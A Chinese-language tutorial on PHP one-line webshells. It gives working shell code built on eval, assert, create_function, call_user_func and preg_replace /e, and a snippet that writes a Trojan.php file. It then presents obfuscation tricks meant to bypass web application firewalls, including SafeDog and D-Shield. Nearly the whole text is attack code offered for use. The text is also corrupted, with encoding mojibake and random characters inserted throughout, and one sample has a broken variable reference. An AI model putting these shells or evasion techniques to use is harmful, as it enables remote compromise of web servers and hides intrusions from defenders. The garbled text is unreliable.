什么是一句話木馬

一句話木馬就是只需要一行代碼的木馬，短短一行代碼，就能做到和大馬相當(dāng)?shù)墓δ艹况ā榱死@過waf的檢測(cè)行瑞，一句話木馬出現(xiàn)了無數(shù)中變形，但本質(zhì)是不變的：木馬的函數(shù)執(zhí)行了我們發(fā)送的命令餐禁。

我們?nèi)绾伟l(fā)送命令血久，發(fā)送的命令如何執(zhí)行？

我們可以通過GET 帮非、POST 氧吐、COOKIE這三種方式向一個(gè)網(wǎng)站提交數(shù)據(jù)，一句話木馬用$_GET[' ']末盔、$_POST[' ']筑舅、$_COOKIE[' '] 接收我們傳遞的數(shù)據(jù)，并把接收的數(shù)據(jù)傳遞給一句話木馬中執(zhí)行命令的函數(shù)陨舱，進(jìn)而執(zhí)行命令翠拣。
所以看到的經(jīng)典一句話木馬大多都是只有兩個(gè)部分，一個(gè)是可以執(zhí)行代碼的函數(shù)部分游盲，一個(gè)是接收數(shù)據(jù)的部分误墓。

例如：<?php eval(@$_POST['a']); ?>

其中eval就是執(zhí)行命令的函數(shù)，$_POST['a']就是接收的數(shù)據(jù)益缎。eval函數(shù)把接收的數(shù)據(jù)當(dāng)作PHP代碼來執(zhí)行优烧。這樣我們就能夠讓插入了一句話木馬的網(wǎng)站執(zhí)行我們傳遞過去的任意PHP語句。這便是一句話木馬的強(qiáng)大之處链峭。

示例：

phpinfo.png

因?yàn)槟抉R是接收post請(qǐng)求中 “a” 的數(shù)據(jù)（ $_POST[‘a(chǎn)’]）,所以我們必須以post方法發(fā)送數(shù)據(jù)并且將我們要執(zhí)行的代碼賦值給“a”畦娄。如果把木馬中的post替換成get，那么我么就需要以GET方法發(fā)送“a”弊仪，（ 就像這樣： http://127.0.0.1/test.php?a=phpinfo(); ）我就不再另行演示了熙卡。

使用 其他函數(shù)制作一句話木馬

assert函數(shù)

<?php assert(@$_POST['a']); ?>

create_function函數(shù)

<?php 
$fun = create_function('',$_POST['a']);
$fun();
?>

把用戶傳遞的數(shù)據(jù)生成一個(gè)函數(shù)fun()，然后再執(zhí)行fun()

call_user_func回調(diào)函數(shù)

<?php
@call_user_func(assert,$_POST['a']);
?>

call_user_func這個(gè)函數(shù)可以調(diào)用其它函數(shù)励饵，被調(diào)用的函數(shù)是call_user_func的第一個(gè)函數(shù)驳癌，被調(diào)用的函數(shù)的參數(shù)是call_user_func的第二個(gè)參數(shù)。這樣的一個(gè)語句也可以完成一句話木馬役听。一些被waf攔截的木馬可以配合這個(gè)函數(shù)繞過waf颓鲜。

preg_replace函數(shù)

<?php 
@preg_replace("/abcde/e", $_POST['a'], "abcdefg");
?>

這個(gè)函數(shù)原本是利用正則表達(dá)式替換符合條件的字符串，但是這個(gè)函數(shù)有一個(gè)功能——可執(zhí)行命令典予。這個(gè)函數(shù)的第一個(gè)參數(shù)是正則表達(dá)式甜滨，按照PHP的格式，表達(dá)式在兩個(gè)“/”之間瘤袖。如果我們?cè)谶@個(gè)表達(dá)式的末尾加上“e”衣摩，那么這個(gè)函數(shù)的第二個(gè)參數(shù)就會(huì)被當(dāng)作代碼執(zhí)行。

file_put_contents函數(shù)

利用函數(shù)生成木馬

<?php
$test='<?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>

函數(shù)功能：生成一個(gè)文件捂敌，第一個(gè)參數(shù)是文件名艾扮，第二個(gè)參數(shù)是文件的內(nèi)容既琴。

如何讓一句話木馬繞過waf ?

waf是網(wǎng)站的防火墻，例如安全狗就是waf的一種泡嘴。waf通常以關(guān)鍵字判斷是否為一句話木馬甫恩，但是一句話木馬的變形有很多種，waf根本不可能全部攔截酌予。想要繞過waf填物，需要掌握各種PHP小技巧，掌握的技巧多了霎终，把技巧結(jié)合起來滞磺，設(shè)計(jì)出屬于自己的一句話木馬。

PHP變量函數(shù)

<?php 
$a = "eval";
$a(@$_POST['a']); 
?>

第三行使用了變量函數(shù)$a莱褒，變量?jī)?chǔ)存了函數(shù)名eval击困，便可以直接用變量替代函數(shù)名。

PHP可變變量

<?php
$bb="eval";
$a="bb";
$$aa($_POST['a']);
?>

看這句就能理解上述語句：$$aa = $($aa) = $ (‘bb’) = $bb = "eval"

str_replace函數(shù)

<?php
$a=str_replace("Waldo", "", "eWaldoval");
$a(@$_POST['a']);
?>

函數(shù)功能：在第三個(gè)參數(shù)中广凸，查找第一個(gè)參數(shù)阅茶，并替換成第二個(gè)參數(shù)。這里第二個(gè)參數(shù)為空字符串谅海，就相當(dāng)于刪除"Waldo"脸哀。

base64_decode函數(shù)

<?php
$a=base64_decode("ZXZhbA==")
$a($_POST['a']);
?>

這里是base64解密函數(shù)，"ZXZhbA=="是eval的base64加密扭吁。

"."操作符

<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST['a']);
?>

parse_str函數(shù)

<?php
$str="a=eval";
parse_str($str);
$a($_POST['a']);
?>

執(zhí)行這個(gè)函數(shù)后撞蜂，生成一個(gè)變量$a，值為字符串"eval"

更多技巧...

多實(shí)戰(zhàn)侥袜，多谷歌蝌诡！
上述六種技巧每一種單獨(dú)使用都不能繞過waf，但是與 第三大點(diǎn)提到的函數(shù)混合起來使用枫吧，就可以順利的欺騙waf浦旱。
tips：使用一句話木馬的時(shí)候可以在函數(shù)前加”@”符，這個(gè)符號(hào)讓php語句不顯示錯(cuò)誤信息九杂，增加隱蔽性颁湖。

再來一個(gè)小栗子

<?php
function fun()
{return $_POST['a'];}
@preg_replace("/test/e",fun(),"test test test");
?>

這里又有一個(gè)技巧，創(chuàng)建函數(shù) fun()例隆，返回post中“a”的數(shù)據(jù)甥捺。我的這個(gè)例子很明顯是一句話木馬，但是安全狗卻掃不出裳擎，D盾也是如此涎永。